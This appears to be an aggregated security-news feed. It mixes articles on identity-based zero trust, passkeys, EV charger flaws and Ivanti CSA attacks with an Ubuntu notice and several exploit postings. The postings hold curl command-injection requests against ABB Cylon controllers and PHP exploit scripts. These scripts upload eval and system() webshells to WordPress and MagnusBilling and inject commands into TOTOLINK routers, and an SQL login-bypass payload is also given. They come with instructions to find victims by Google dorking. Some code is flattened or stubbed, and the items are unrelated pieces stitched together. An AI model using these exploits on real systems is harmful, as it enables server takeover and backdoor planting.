Ultimately, the goal of creating a trusted environment around all digital assets and devices is about modernizing the way you do business.

Alex Simons, Corporate VP, Product Management, Microsoft Identity and Network Access

October 14, 2024

5 Min Read

Source: Brian Jackson via Alamy Stock Photo

COMMENTARY

In today's digital world, threats are around every corner. The technology behind attacks is increasingly sophisticated. Actors include criminal organizations seeking big payouts and nation-states conducting espionage and looking for opportunities to create chaos.  

At the same time, the world continues to transform rapidly around us. With artificial intelligence (AI), we're about to go through the biggest business transformation since the widespread adoption of the Internet, and the bad guys are also exploring how they can use AI for harm.  

In a mobile, cloud-first, AI-driven world, companies must be ready to use world-class technology and processes to protect themselves, their data, and their people, wherever they go.  

Today, those technologies are coalescing around a modern vision for what is, at its heart, one of our most ancient security solutions: our own unique identity. Let's take a look at how a modern version of this ancient solution can help protect our digital lives.  

**Your Castle Walls Have Fallen. What Now? **

Fifteen years ago, the world's security best practice was a "moat-and-castle" model. Organizations kept their most important resources inside their office networks and wrapped a firewall around them.  

As long as their people and resources were inside the wall, everybody could connect to everything as the entire estate was trusted and contained. Your biggest concerns were insider threats or invaders trying to storm your firewall.  

Today, many employees are embracing hybrid and mobile workstyles. We're also adding cloud-scale AI that, by design, is not inside the firewall, while highly mobile workers use VPNs to access applications while outside the network. All this makes the old moat-and-castle security paradigm terribly outdated.  

Additionally, in many ways, companies are becoming cloud services — as their partners, suppliers and customers increasingly interact with them through digital experiences for product discovery, ordering, payment, invoicing, customer service, and customer loyalty programs.  

**Since Data and People Are Always in Transit, Security Should Flow Wherever They Go**

In a world where every organization is a cloud service that needs to securely interact with everybody and everything, companies must ensure that all of their connections are secure and that only the right people, software, devices, and networks are allowed access.  

This is known as a zero-trust model. In a zero-trust environment, every time a user, a device, or a workload wants to access your digital assets and services, they have to prove that they, their software, and the network they're using are all trustworthy. This is why identity plays such an important role in this new security model. By default, all access to everything is closed off until you have a strong proof of the identity and authenticity of the person and of their device. 

Designing, deploying, and running this kind of identity powered zero-trust enterprise environment can be challenging. It requires having a coordinated strategy across multiple teams to design, deploy, and run a security solution that brings together user and workload accounts, device management, device protection, network state, and an inventory of digital resources and permissions, and enables the enforcement of adaptive, granular access policies across the enterprises entire digital estate. 

**Identity: Even More Important in the Era of AI **

If your organization doesn't have this kind of identity-centric zero-trust model in place today, moving to an AI future is going to be risky and challenging. When you deploy a large language model (LLM) assistant, it becomes incredibly easy for employees to find content from across all your  documents and files, even the ones you didn’t know they had rights to access.  

And that also means an intruder could use the AI assistant to run queries for assets that they never should be able to find. Where organizations used to have the benefit of obscure file hierarchies to waste an attacker's time, today's super-smart AI engines make it incredibly easy to quickly find information anywhere it's stored.  

The solution is something called "workload identities." A workload identity is the identity your software systems use to get things done. Having your co-pilot or your LLM use a workload identity with well-managed permissions means that it can only get to the specific documents and files you allow it to access, which enables you to govern and secure the LLM's access just like you would for any user.  

**Modern Security Benefits Everyone**

Ultimately, creating a trusted environment can modernize the way you do business. Now, employees can work from anywhere. The company can hire talent it wouldn't have access to before. The company can work directly with customers and suppliers digitally. And you can do all that in a world of cloud, AI, and mobile resources that can easily scale up and down.  

Employees, partners, and customers all get a seamless experience on the devices they choose, wherever they want to work. And chief information security officers (CISOs) can be confident that it's happening with security omnipresent.  

And it's all made possible by focusing on the oldest access solution of all — your own unique identity.  

**About the Author**

Corporate VP, Product Management, Microsoft Identity and Network Access

Alex Simons is corporate vice president, product management, Microsoft Identity and Network Access Division. He is responsible for driving the vision and strategy, product roadmap, and feature design of the Microsoft Entra Suite. He prides himself on being deeply connected to customers and has direct relationships with many of Microsoft’s largest enterprise customers. In addition to managing his own team, Alex is responsible for partnering with teams across Office, Windows, Azure, Visual Studio, Dynamics, Xbox, and LinkedIn to deliver world-class identity experiences and security and compliance controls.

Why Your Identity Is the Key to Modernizing Cybersecurity

“Passkeys,” the secure authentication mechanism built to replace passwords, are getting more portable and easier for organizations to implement thanks to new initiatives the FIDO Alliance announced on Monday.

The password-killing tech known as “passkeys” have proliferated over the past two years, developed by the tech industry association known as the FIDO Alliance as an easier and more secure authentication alternative. And although superseding any technology as entrenched as passwords is difficult, new features and resources launching this week are pushing passkeys toward a tipping point.

At the FIDO Alliance's Authenticate Conference in Carlsbad, California, on Monday, researchers are announcing two projects that will make passkeys easier for organizations to offer—and easier for everyone to use. One is a new technical specification called Credential Exchange Protocol (CXP) that will make passkeys portable between digital ecosystems, a feature that users have increasingly demanded. The other is a website, called Passkey Central, where developers and system administrators can find resources like metrics and implementation guides that make it easier to add support for passkeys on existing digital platforms.

“To me, both announcements are part of the broader story of the industry working together to stop our dependence on passwords,” Andrew Shikiar, CEO of the FIDO Alliance, told WIRED ahead of Monday's announcements. “And when it comes to CXP, we have all these companies who are fierce competitors willing to collaborate on credential exchange."

CXP comprises a set of draft specifications developed by the FIDO Alliance's “Credential Provider Special Interest Group.” Development of technical standards can often be a fraught bureaucratic process, but the creation of CXP seems to have been positive and collaborative. Researchers from the password managers 1Password, Bitwarden, Dashlane, NordPass, and Enpass all worked on CXP, as did those from the identity providers Okta as well as Apple, Google, Microsoft, Samsung, and SK Telecom.

The specifications are significant for a few reasons. CXP was created for passkeys and is meant to address a longstanding criticism that passkeys could contribute to user lock-in by making it prohibitively difficult for people to move between operating system vendors and types of devices. In many ways, though, this problem already exists with passwords. Export features that allow you to move all of your passwords from one manager to another are often dangerously exposed and essentially just dump a list of all of your passwords into a plaintext file.

It's gotten much easier to sync passkeys across your devices through a single password manager, but CXP aims to standardize the technical process for securely transferring them between platforms so users are free—and safe—to roam the digital landscape. Importantly, while CXP was designed with passkeys in mind, it is really a specification that can be adapted to securely exchange other secrets as well, including passwords or other types of data.

“In the future, this could apply to mobile driver's licenses, say, or passports—any secrets that you want to export somewhere and import into another system,” Christiaan Brand, identity and security group product manager at Google, tells WIRED. “We've got most of the rough edges sanded down with passkeys, but one of the main pieces of negative feedback over the past year has been around portability and potential vendor lock-in. I think with this, we are signaling to the world that passkeys are growing up.”

The goal of the resource repository Passkey Central is similarly to help the ecosystem expand and mature. Product leads or security professionals who want to implement passkeys for their user base may need to make a business case to executives to get budget for the project. The FIDO Alliance is basically aiming to help them with the pitch—providing data and communications materials—and then support their rollout with prefab materials like implementation and roll-out guides, user experience and design guidelines, documentation around accessibility, and troubleshooting.

“We've made amazing progress on passkeys,” FIDO's Shikiar says. “Usability and user experience are pretty much there. But we do have a punch list and we’re actively working on it. Portability is an important feature on that list. And while the biggest brands on the planet are now using passkeys at scale, there’s a very long tail of companies that haven’t gotten started yet. So we want to offer resources and the assets they need to be successful."

Craig Newmark Philanthropies' Cyber Civil Defense coalition provides some funding to advance passkeys. In an interview with WIRED ahead of Monday's announcements, Newmark said he believes that passkeys can make a real difference both for the digital security of individual people and for internet security overall.

“There are a lot of vulnerable systems out there,” Newmark says. “You need to make it a lot harder for bad actors to defeat password schemes. You need to make everything more secure, and passkeys is part of that.”

The War on Passwords Is One Step Closer to Being Over

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the PROXY HTTP POST parameter called by the yumSettings.php script.

  
ABB Cylon Aspect 3.08.00 (yumSettings.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'PROXY' HTTP POST parameter called by the yumSettings.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5841  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5841.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl -X POST "http://192.168.73.31/yumSettings.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -d "CMD=set&PROXY=;id>/tmp/blah"  
Set proxy called - no proxy given:  
$   
$ curl -X POST "http://192.168.73.31/caldavUtil.php" \  
> -d "command=postFooter&Footer=%60cat /tmp/blah%60"  
Set footer to uid=33(www-data) gid=33(www-data) groups=33(www-data):

ABB Cylon Aspect 3.08.00 yumSettings.php Command Injection

Ubuntu Security Notice 7063-1 - Marco Trevisan discovered that the Ubuntu Advantage Desktop Daemon leaked the Pro token to unprivileged users by passing the token as an argument in plaintext. An attacker could use this issue to gain unauthorized access to an Ubuntu Pro subscription.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

==========================================================================  
Ubuntu Security Notice USN-7063-1  
October 11, 2024

ubuntu-advantage-desktop-daemon vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- - Ubuntu 24.04 LTS  
- - Ubuntu 22.04 LTS  
- - Ubuntu 20.04 LTS  
- - Ubuntu 18.04 LTS  
- - Ubuntu 16.04 LTS

Summary:

Ubuntu Advantage Desktop Daemon could be made to expose sensitive information.

Software Description:  
- - ubuntu-advantage-desktop-daemon: Daemon to allow access to  
ubuntu-advantage via D-Bus

Details:

Marco Trevisan discovered that the Ubuntu Advantage Desktop Daemon leaked  
the Pro token to unprivileged users by passing the token as an argument  
in plaintext. An attacker could use this issue to gain unauthorized access  
to an Ubuntu Pro subscription. (CVE-2024-6388)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  ubuntu-advantage-desktop-daemon  1.11ubuntu0.1

Ubuntu 22.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.22.04.2

Ubuntu 20.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.20.04.1

Ubuntu 18.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.18.04.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  ubuntu-advantage-desktop-daemon  1.10.ubuntu0.16.04.1~esm1  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7063-1  
  CVE-2024-6388

Package Information:  
  https://launchpad.net/ubuntu/+source/ubuntu-advantage-desktop-daemon/1.11ubuntu0.1  
  https://launchpad.net/ubuntu/+source/ubuntu-advantage-desktop-daemon/1.10.ubuntu0.22.04.2  
  https://launchpad.net/ubuntu/+source/ubuntu-advantage-desktop-daemon/1.10.ubuntu0.20.04.1  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEETB/nIDy9nvCSgAUj3gXQmO/Tr3wFAmcJXGoACgkQ3gXQmO/T  
r3yg3Q/+JzokSz0NaoKK0RJQRzLd3uVD1le+tjU7ceG92a8K2dMPeNLI7ppbcM1Y  
HwFkA0Ss08yinX5U6Frsz1obKpOKioJWc1GlMSAqXm/TxdG7GyrahIa8JG4tzViG  
ySwXij8EGa5DQEpzrooBm2OWTG4y2GR5Ls1zh0zXCagQLw+HrfcFDdqUr8GZX49e  
n5dEdSid3NQ0l6o9GFJ+9EljhCFMKK9J0ZohgeMdC1zGs3+bvA0N5Os0O1TWYBgB  
CPKv1Ho2rNrT2H//oxjS+Bo31xFoL62/IkVAxie80I+91/Pm3tuscsa8tTiiywGh  
azw3m7zapehfU+6megQU8ApRqHA1srEE8huL+Orq4/DjKzSDEsBz7CRCMxNyAipF  
EI4jDBVciV1oUBbs7TCjqtnNMB2SuY9Rk7LrenCQpHcK/5vtvplrs0sSUSF2yvuE  
yWYreCkx/dr11Qv+hK9ibgdFiiGTQNIERKERKQPPp1CXrsetzWFLRrIntA0jqkWE  
D/g5bFS30n8TDsBvK68Lagw35TUqvMfLHk+rvb+Gws5+QrpBgrl/iwF5rJZ3eopJ  
XDN4wnGAVrJXxXRoNLFtBVPGvD/Vmf7f3kWo131Q+8fNQa/At5hPN/nnYT3q9ZWJ  
ePjJmfCK3/sN1I2y8lcx5ahEKzpfJYmvon2aTs7Sag/U0/Gf1SA=  
=GNGa  
-----END PGP SIGNATURE-----

Ubuntu Security Notice USN-7063-1

NCC Group experts share details of how they exploited critical zero-day vulnerabilities in Phoenix Contact EV chargers (electric…

NCC Group experts share details of how they exploited critical zero-day vulnerabilities in Phoenix Contact EV chargers (electric vehicles chargers) at 44con, demonstrating the cybersecurity risks. Discover the technical details and consequences of the flaws.

A recent presentation by McCaulay Hudson and Alex Plaskett from NCC Group at the 44CON conference in London, England revealed critical security risks within **electric vehicle (EV) charging infrastructure.**

The researchers, who won $70,000 for hacking the Phoenix Contact CHARX SEC-3100 EV charger controller, have now provided details of exploiting multiple zero-day vulnerabilities to gain full control of the device. 

For your information, the vulnerabilities were discovered at the Pwn2Own Automotive 2024 event, a three-day contest organized by Trend Micro’s Zero Day Initiativezero-day-, held earlier this year and **reported** by Hackread.com. 

The CERT/VDE **advisory** VDE-2024-022 identified two vulnerabilities in Phoenix Contact CHARX SEC-3xxx charge controllers. One, a High severity vulnerability (CVE-2024-6788- CVSS score 8.6), allowed unauthorized access before the firewall was fully initialized, potentially disrupting the EV charger’s operation or gaining sensitive data. 

The second is a Medium severity vulnerability (CVE-2024-3913- CVSS score 7.5), allowing an attacker to reset the user-app account password, potentially granting elevated privileges to limited users. Despite the severity of the second vulnerability, it could still allow an attacker to gain unauthorized access and disrupt the device’s operation. 

Plaskett and Hudson spoke about how they successfully exploited vulnerabilities in the EV charger controller for the first time at **44Con** (PDF).

As per their **findings** (PDF), after a firmware update, the device reset the password for a pre-defined user account (“user-app”) to its default value (“user”), allowing them to gain initial access via SSH. By running a DHCP server, they could trick the device into switching from server mode to client mode, exposing additional attack vectors, uploading malicious scripts, and manipulating configuration settings. 

Researchers could chain together multiple seemingly **low-risk vulnerabilities** to escalate their impact and achieve code execution on the charger controller. Both vulnerabilities led to Remote Code Execution, granting them complete control over the charger. 

The compromised chargers have the potential for widespread attacks in real-world deployments, researchers noted. Attackers could exploit the flaws to shut down entire charging stations or launch **ransomware attacks**.

Moreover, attackers can deface charger displays, steal data from connected vehicles, integrate them into botnets for coordinated attacks, disrupt charging services through DoS attacks, and manipulate charging processes to steal electricity or commit payment fraud, researchers noted. 

Thankfully, the vulnerabilities have since been **patched.** However, researchers emphasize t the need for EV charging infrastructure manufacturers and operators to prioritize security, as the number of charging stations is expected to rise, necessitating robust protection.

1.  **Hacking Honda and Nissan Cars by Knowing VIN**
2.  **Leading EV Charging Firm Spills Customer Info in Server Leak**
3.  **Hackers Remotely Control Kia Cars by Exploiting License Plates**
4.  **Anonymous hacks EV charging station with pro-Ukraine message**
5.  **Researchers Hack Tesla Vehicles, Gain Control Over Paid Features**

Zero-day Flaws Exposed EV Chargers to Shutdowns and Data Theft

WordPress File Manager Advanced Shortcode plugin version 2.3.2 suffers from a code injection vulnerability that allows for remote shell upload.

    =============================================================================================================================================| # Title     : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 106 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass MetasploitModule {    private $targetUri;    private $webshellName;    private $wpData;    private $uploadPath;    private $postParam;    private $getParam;    public function __construct($targetUri, $webshell = null, $command = 'passthru') {        $this->targetUri = $targetUri;        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();        $this->postParam = $this->generateRandomString();        $this->getParam = $this->generateRandomString();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(rand(8, 16))) . '.php';    }    private function generateRandomString($length = 8) {        return bin2hex(random_bytes($length));    }    private function getFormData($pngWebshell) {        // Construct multipart form data        $boundary = md5(time());        $formData = "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n";        $formData .= "--$boundary\r\n";        $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n";        $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n";        $formData .= "--$boundary--\r\n";        return ['data' => $formData, 'boundary' => $boundary];    }    private function uploadWebshell($pngWebshell) {        $formData = $this->getFormData($pngWebshell);        $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [            "Content-Type: multipart/form-data; boundary={$formData['boundary']}"        ]);        // Handle response and check for upload success        $responseData = json_decode($response, true);        if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) {            return true;        }                return false;    }    private function injectPhpPayloadPng($payload) {        // Here you should inject PHP code into a PNG file        // This is just a placeholder for the actual implementation        return $payload; // Placeholder for the injected PNG    }    private function executeCommand($cmd) {        $payload = base64_encode($cmd);        $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [            $this->getParam => 'passthru', // replace with the command function            $this->postParam => $payload        ]);    }    private function sendRequest($method, $uri, $data, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($method == 'POST') {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function exploit() {        // Check for vulnerabilities and upload webshell logic        $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($payload);        if ($this->uploadWebshell($pngWebshell)) {            $this->executeCommand('whoami'); // Replace 'whoami' with your desired command        } else {            echo "Failed to upload webshell.";        }    }}// Usage example$exploit = new MetasploitModule('http://target-uri.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload

TOTOLINK version 9.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : TOTOLINK 9.x Code Injection Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.totolink.net/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit {  
    private $targetUri;  
    private $sleepTime;

    public function __construct($targetUri, $sleepTime = 3) {  
        $this->targetUri = $targetUri;  
        $this->sleepTime = $sleepTime;  
    }

    // Function to send POST request and execute the command on the target  
    public function executeCommand($cmd) {  
        $num = rand(1, 500);  
        $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
        $data = json_encode([  
            "command" => "127.0.0.1; {$cmd};#",  
            "num" => $num,  
            "topicurl" => "setTracerouteCfg"  
        ]);

        // Send POST request  
        return $this->sendPostRequest($url, $data);  
    }

    // Check if the target is vulnerable  
    public function check() {  
        echo "Checking if the target can be exploited.\n";

        // Test using echo command to see if it's vulnerable  
        $response = $this->executeCommand("echo test");  
        if (!$response || strpos($response, 'success') === false) {  
            return "Target is likely not vulnerable.\n";  
        }

        // Test command injection using sleep  
        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
        $start = microtime(true);  
        $this->executeCommand("sleep {$this->sleepTime}");  
        $elapsedTime = microtime(true) - $start;

        echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
        if ($elapsedTime >= $this->sleepTime) {  
            return "Target is vulnerable: Blind command injection successful.\n";  
        }

        return "Command injection test failed.\n";  
    }

    // Exploit the vulnerability to run the payload  
    public function exploit($payload) {  
        echo "Executing payload on the target.\n";  
        $this->executeCommand($payload);  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => $postFields  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with actual target URL  
$exploit = new TotolinkExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TOTOLINK 9.x Command Injection

MagnusBilling version 7.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 7.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 7.x Command Injection

Bookstore Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Bookstore Management System v1.0 SQL injection Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_bms-zip.zip                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ' or 0=0 ##[+] hLOgin : http://127.0.0.1/BMS/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Bookstore Management System 1.0 SQL Injection

A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.
That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the

Network Security / Vulnerability

A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.

That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the credentials of those users.

"The advanced adversaries were observed exploiting and chaining zero-day vulnerabilities to establish beachhead access in the victim's network," security researchers Faisal Abdul Malik Qureshi, John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans, and Robert Reyes said.

The flaws in question are listed below -

*   **CVE-2024-8190** (CVSS score: 7.2) - A command injection flaw in the resource /gsb/DateTimeTab.php
*   **CVE-2024-8963** (CVSS score: 9.4) - A path traversal vulnerability on the resource /client/index.php
*   **CVE-2024-9380** (CVSS score: 7.2) - An authenticated command injection vulnerability affecting the resource reports.php

In the next stage, the stolen credentials associated with gsbadmin and admin were used to perform authenticated exploitation of the command injection vulnerability affecting the resource /gsb/reports.php in order to drop a web shell ("help.php").

